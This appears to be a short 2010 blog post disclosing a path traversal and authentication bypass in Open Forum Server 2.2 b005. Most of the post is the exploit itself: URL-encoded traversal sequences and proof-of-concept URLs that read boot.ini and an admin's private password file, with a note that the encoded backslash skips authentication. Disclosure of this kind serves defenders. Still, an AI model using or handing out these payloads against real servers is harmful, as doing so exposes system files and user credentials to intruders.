It's possible to navigate the local file system of a server running Open Forum Server 2.2 b005 by using a specially crafted URL.
Exploit:
%2F../
%5C../
%5C
PoC:
http://localhost/%5C../%5C../%5C../%5C../%5C../%5C../%5C../boot.ini
http://localhost/Admin/Users/Admin/private%5Cpassword.txt
Note: the percent encoded backslash in the second second url bypasses authentication. However, the response is malformed so a debugging proxy may be necessary to view it.
Saturday, May 15, 2010
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment